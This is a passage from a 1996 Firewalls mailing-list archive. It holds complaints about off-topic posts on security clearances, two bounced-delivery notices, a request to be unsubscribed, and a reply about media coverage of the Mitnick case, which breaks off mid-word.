Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura
To: brain21@montag33.residence.gatech.edu (Brain21)
Date: Tue, 16 Jan 1996 14:29:11 +1100 (EDT)
Cc: del@giant.IntraNet.com, Firewalls@GreatCircle.COM
In-Reply-To: from "Brain21" at Jan 15, 96 01:12:09 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Brain21, sie said:
[...]
> My father did NOTHING that would even insinuate that there is ANYTHING to
> arrest him for (sheesh! Some people need everything spelled out
> explicitly, I think), but he was NOT educated either by his company OR
> the government as to these issues. I really don't think anyone said
> anything to him other than a passing "don't send this stuff out over the
> net. The net is for administrative email between offices, like arranging
> business trips, etc. and asking for fax requests," *IF* they even said
> that much.

Can we stop hearing about your father already? The relevance of his life and firewalls eludes me, except that he is yet another person who has worked with a security classification, much like thousands of other Americans have and do. I've already prompted you twice in private e-mail about getting off-course as far as firewalls, now I'm asking you publicly: please desist. I'm sure there are others (hi Padgett :) who have equally fascinating stories.

Start alt.security.stories or something, but please keep posts here about firewalls, issues relating to firewalls and not just general ITSEC gunk. There are also comp.security.firewalls, comp.security.misc as other forums for you to tell the world about his adventures if you feel the need.

Let's try to bring the signal:noise ratio up?

Thank you,
Darren

From firewalls-owner Mon Jan 15 20:10:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA14643 for firewalls-outgoing; Mon, 15 Jan 1996 19:55:41 -0800 (PST)
Received: from saguaro.flyingfox.com (saguaro.flyingfox.com [204.188.109.125]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA14638 for ; Mon, 15 Jan 1996 19:55:37 -0800 (PST)
Received: (from jas@localhost) by saguaro.flyingfox.com (8.6.12/8.6.10) id TAA19538; Mon, 15 Jan 1996 19:52:53 -0800
Date: Mon, 15 Jan 1996 19:52:53 -0800
From: Jim Shankland
Message-Id: <199601160352.TAA19538@saguaro.flyingfox.com>
To: blymn@awadi.com.au, shan.bell@sware.com
Subject: Re: "Title for Firewall Admin?
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Jeez, I hate to be a signal-to-noise grouch, especially because being one in public just adds to the noise, but personally, I'm about saturated on security clearance trivia, whose father ought to be arrested, what to call a firewall administrator, and details about the movie "Ghostbusters."

Just another data point.

Jim Shankland
Flying Fox Computer Systems, Inc.
From firewalls-owner Mon Jan 15 20:55:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA17678 for firewalls-outgoing; Mon, 15 Jan 1996 20:49:36 -0800 (PST)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA17673 for ; Mon, 15 Jan 1996 20:49:30 -0800 (PST)
Received: from gateway.deere.com by relay5.UU.NET with SMTP id QQzysh25146; Mon, 15 Jan 1996 23:48:35 -0500 (EST)
Received: by gateway.deere.com; id WAA29519; Mon, 15 Jan 1996 22:48:32 -0600
Received: from deere.com(192.43.1.3) by gateway.deere.com via smap (g3.0.1) id xma029510; Mon, 15 Jan 96 22:48:20 -0600
Received: from TCP30.DX.DEERE.COM (tcp30-11.dx.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA16974; Mon, 15 Jan 96 22:48:21 CST
Received: by TCP30.DX.DEERE.COM (Soft*Switch Central V4L380P6) id 415845220096015FDACDXC01; 15 Jan 1996 22:45:22 GMT
Message-Id:
Date: 15 Jan 1996 22:45:22 GMT
From: "Postmaster"
Subject: DISTRIBUTION STATUS
To: Firewalls@GREATCIRCLE.COM
Comment: MEMO 01.15.96 22.45
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

SAUTOIN1.FIREWALL DISTRIBUTION STATUS INFORMATION 01/15/96 22:45:00
=======================================================================
DISTRIBUTION ID: SAUTOIN1.FIREWALL.4056
SUBJECT        : Firewalls-Digest V5 #31
DOCUMENT NAME  : %%DOCNAME
DATE SENT      : 01/15/96    TIME SENT: 22:33:00
=======================================================================
YOUR MAIL WAS NOT DELIVERED FOR THE FOLLOWING REASON:
SNADS STATUS   : 000F
X.400 CODE     : %%DIAGCODE
INFORMATION    : %%SUPPLINFO
EXPLANATION    : SNADS SYSTEM ERROR
=======================================================================
RECIPIENT      : DACRXL01.OUTX187
LAST NAME      : RATH
FIRST NAME     : JOHN
MIDDLE INITIAL :
INITIALS       :
NATIVE NAME    :
COUNTRY        : US
ADMD           : TELEMAIL
PRMD           : TRT400
ORGANIZATION   : JOHN DEERE
ORG UNIT 1     : DACRXL01
ORG UNIT 2     :
ORG UNIT 3     :
ORG UNIT 4     :
DDA            : ID!OUTX187
TITLE          : DESKTOP SUPPORT
DESCRIPTION    : CUSTOMER SUPPORT (TEAM TECH)
USERDATA       : T 426:DUBUQUE WORKS
TELEPHONE      : 3015123

From firewalls-owner Mon Jan 15 21:10:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA17643 for firewalls-outgoing; Mon, 15 Jan 1996 20:48:35 -0800 (PST)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA17637 for ; Mon, 15 Jan 1996 20:48:31 -0800 (PST)
Received: from gateway.deere.com by relay5.UU.NET with SMTP id QQzysh25059; Mon, 15 Jan 1996 23:47:34 -0500 (EST)
Received: by gateway.deere.com; id WAA29468; Mon, 15 Jan 1996 22:47:30 -0600
Received: from deere.com(192.43.1.3) by gateway.deere.com via smap (g3.0.1) id xma029432; Mon, 15 Jan 96 22:47:24 -0600
Received: from TCP30.DX.DEERE.COM (tcp30-11.dx.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA16813; Mon, 15 Jan 96 22:47:23 CST
Received: by TCP30.DX.DEERE.COM (Soft*Switch Central V4L380P6) id 285445220096015FDACDXC01; 15 Jan 1996 22:45:22 GMT
Message-Id:
Date: 15 Jan 1996 22:45:22 GMT
From: "Postmaster"
Subject: DISTRIBUTION STATUS
To: Firewalls@GREATCIRCLE.COM
Comment: MEMO 01.15.96 22.45
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

SAUTOIN1.FIREWALL DISTRIBUTION STATUS INFORMATION 01/15/96 22:45:00
=======================================================================
DISTRIBUTION ID: SAUTOIN1.FIREWALL.4032
SUBJECT        : Firewalls-Digest V5 #32
DOCUMENT NAME  : %%DOCNAME
DATE SENT      : 01/15/96    TIME SENT: 22:30:00
=======================================================================
YOUR MAIL WAS NOT DELIVERED FOR THE FOLLOWING REASON:
SNADS STATUS   : 000F
X.400 CODE     : %%DIAGCODE
INFORMATION    : %%SUPPLINFO
EXPLANATION    : SNADS SYSTEM ERROR
=======================================================================
RECIPIENT      : DACRXL01.OUTX187
LAST NAME      : RATH
FIRST NAME     : JOHN
MIDDLE INITIAL :
INITIALS       :
NATIVE NAME    :
COUNTRY        : US
ADMD           : TELEMAIL
PRMD           : TRT400
ORGANIZATION   : JOHN DEERE
ORG UNIT 1     : DACRXL01
ORG UNIT 2     :
ORG UNIT 3     :
ORG UNIT 4     :
DDA            : ID!OUTX187
TITLE          : DESKTOP SUPPORT
DESCRIPTION    : CUSTOMER SUPPORT (TEAM TECH)
USERDATA       : T 426:DUBUQUE WORKS
TELEPHONE      : 3015123

From firewalls-owner Mon Jan 15 21:25:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA19400 for firewalls-outgoing; Mon, 15 Jan 1996 21:21:49 -0800 (PST)
Received: from mailx.best.com (mailx.best.com [204.156.128.56]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA19349 for ; Mon, 15 Jan 1996 21:21:39 -0800 (PST)
Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by mailx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with ESMTP id FAA00349 for ; Tue, 16 Jan 1996 05:22:56 GMT
Received: from [204.156.142.55] (dima.vip.best.com [204.156.142.55]) by shellx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with SMTP id VAA00414 for ; Mon, 15 Jan 1996 21:20:41 -0800
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 15 Jan 1996 21:24:06 -0800
To: Firewalls@GREATCIRCLE.COM
From: dima@best.com (Dimitry Nasledov)
Subject: please fix this list
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Good evening, whoever added dima@best.com to this list! Please remove him from there. You might have been meaning Dima Ruban at best.com. His correct e-mail is: rdy@best.com.

Please fix it soon! Thanks!
=Other (wrong) Dima

From firewalls-owner Mon Jan 15 22:10:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA24169 for firewalls-outgoing; Mon, 15 Jan 1996 22:05:17 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA24164 for ; Mon, 15 Jan 1996 22:05:13 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id BAA31914; Tue, 16 Jan 1996 01:03:16 -0500
Date: Tue, 16 Jan 1996 01:03:15 -0500 (EST)
From: Brain21
To: Berry Kercheval, firewalls@GreatCircle.COM
Subject: Re: "Q" Clearance
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 15 Jan 1996, Brain21 wrote:

> On Sat, 13 Jan 1996, Berry Kercheval wrote:
>
> > It's really not that hard. Top Secret is a Department of Defense clearance
> > level. "Q" is a Department of Energy clearance level.
>
> This all strikes me as odd. When my father did work for that
>
> I'll have to call and ask him.

Well, I did call and ask. He said he has no idea where I got the idea that "Q" was DoD, and not DoE. I suspect I must've heard something out of context, or he misspoke or something.

Anyway, he won't tell me now what clearance he had at the DoD :(

Brain21

From firewalls-owner Mon Jan 15 22:25:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA23082 for firewalls-outgoing; Mon, 15 Jan 1996 21:55:32 -0800 (PST)
Received: from zang.com (zang.com [204.182.238.150]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA23067 for ; Mon, 15 Jan 1996 21:55:27 -0800 (PST)
Received: (from mark@localhost) by zang.com (8.6.9/zang) id TAA08067 for firewalls@greatcircle.com; Mon, 15 Jan 1996 19:52:18 -1000
From: Mark (Mookie)
Message-Id: <199601160552.TAA08067@zang.com>
Subject: Re: The Last Mitnick Post/Thread
To: firewalls@greatcircle.com
Date: Mon, 15 Jan 1996 19:52:15 -1000 (HST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Markoff, and Tsutomo acted reprehensibly by quoting sniffer sessions with Kevin
> and jsz in which my site was mentioned. Not only were the facts wrong

At the time everyone knew Kevin was getting very warm, the simple social contacts people had with him were becoming insidious due to the increased attention being put on him. He was becoming rather infatuated with some people too which some of his antics show. It was in this climate that a process of alienation began where lies were fed him and procrastination was offered as a reason for avoiding his spheres and requests. No one wants to hold the hot potato.

I'm actually observing similar activities today as someone who has a court date approaching is becoming alienated by his own actions and the attitudes of others. Preparing to go to jail was my first thought. Some people never learn.

> who/what netsys.com/Len Rose is, they only bothered to mention the past and not

What do you expect? They are out for emotive impact, bugger the facts.

You being an internet service provider doesn't sell, but a couple of events in the past can be made to give everything a dark and dangerous flavour. Pique interest and generate another percent of sales.

> perhaps someone could clear jsz's name which seems to be pretty muddied by the
> somewhat irresponsible literary excesses which seem to fill the Tsutomo/Markoff

Him and all the others I've heard bandied about. It's a case of tall poppy syndrome where anyone who has a brain is pushed into a higher status than they want or deserve. I've seen a number of people recently who have been spoken of in vaulted tones or thought of as bleeding edge merely because they have had exposure to a lot of systems and their skill set is more than passa